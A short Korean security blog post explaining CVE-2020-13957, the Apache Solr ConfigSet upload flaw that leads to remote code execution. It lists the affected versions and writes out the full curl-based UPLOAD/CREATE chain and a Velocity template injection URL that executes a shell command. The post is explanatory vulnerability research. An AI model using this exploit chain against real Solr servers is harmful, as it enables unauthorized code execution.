[하루한줄] CVE-2020-13957: Apache Solr ConfigSet RCE Vulnerability
URL
CVE-2020-13957: Apache Solr ConfigSet RCE Vulnerability
Target
Apache Solr 6.6.0-6.6.5
Apache Solr 7.0.0-7.7.3
Apache Solr 8.0.0-8.6.2
Explain
Apache Solr는 Apache Lucene을 기반으로 만들어진 검색 엔진입니다. 사용자는 특정 형식의 XML 파일을 서버에 업로드하여 인덱스를 생성하거나 검색 요청을 하여 결과를 XML 형식으로 얻을 수 있습니다.
이러한 Solr의 ConfigSet API 에 unauthrization config upload 가 가능해 RCE까지 이어질 수 있는 취약점이 발견되었습니다.
사용자는 ConfigSet API를 사용해 configset을 업로드하고 logical index를 구성하는 컬렉션을 생성할 수 있습니다. 이 때 원격 코드 실행에 악용될 수 있는 일부 기능들을 필터링해 악성 컬렉션이 구성되는 것을 방지합니다. 그러나 configset.upload.enabled
옵션이 true로 설정되어 있으면 이를 UPLOAD 와 CREATE 로 우회할 수 있습니다.
먼저 악성 configset을 포함하는 압축 파일을 UPLOAD 합니다.
curl -X POST --header "Content-Type:application/octet-stream"--data-binary@7.zip "http://[host]/solr/admin/configs?action=UPLOAD&name=file1"
CREATE는 기존 configset을 기반으로 새로운 configset을 작성할 수 있습니다. 이를 이용해 UPLOAD된 configset을 기반으로 새로운 configset을 만들면 악용 가능한 기능들을 필터링을 하지 않아 인증 검사 로직을 우회할 수 있습니다.
curl "http://[host]/solr/admin/configs?action=CREATE&name=file3&baseConfigSet=file1&configSetProp.immutable=false&wt=xml&omitHeader=true"
2에서 얻은 새로운 configset를 기반으로 악성 컬렉션을 생성합니다.
curl "http://[host]/solr/admin/collections?action=CREATE&numShards=1&name=file2&collection.configName=file3"
생성된 악성 컬렉션은 원격 코드 실행에 사용할 수 있습니다.
http://[host]/solr/newCollection3/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x='')+%23set($rt=$x.class.forName('java.lang.Runtime'))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
Reference
본 글은 CC BY-SA 4.0 라이선스로 배포됩니다. 공유 또는 변경 시 반드시 출처를 남겨주시기 바랍니다.